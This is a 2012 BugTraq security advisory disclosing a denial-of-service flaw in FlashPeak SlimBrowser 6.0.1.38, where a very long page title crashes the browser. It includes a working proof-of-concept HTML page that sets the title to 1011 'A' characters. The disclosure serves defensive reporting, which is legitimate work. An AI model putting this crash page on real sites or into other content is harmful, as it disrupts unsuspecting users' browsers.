BugTraq
FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability May 16 2012 03:12PM
demonalex 163 com
Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability
Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/)

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
FlashPeak SlimBrowser is a web browser Software for FREE.
FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality.

Proof Of Concept :
-----------------------------------------------------------
<html>
<head>
<title>evil page</title>
<body bgcolor="black">
<script type="text/javascript">
function a7(){
var buffer = "";
for (var i = 0; i < 1011; i++) {
buffer += "A";
}
document.title = buffer;
}
</script>
</head>
<body>
<font color="white">
<h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br>
<font>
</body>
</html>
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang (at) connect.polyu (dot) hk [email concealed]
Pentester/Researcher
Dark2S Security Team/PolyU.HK

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus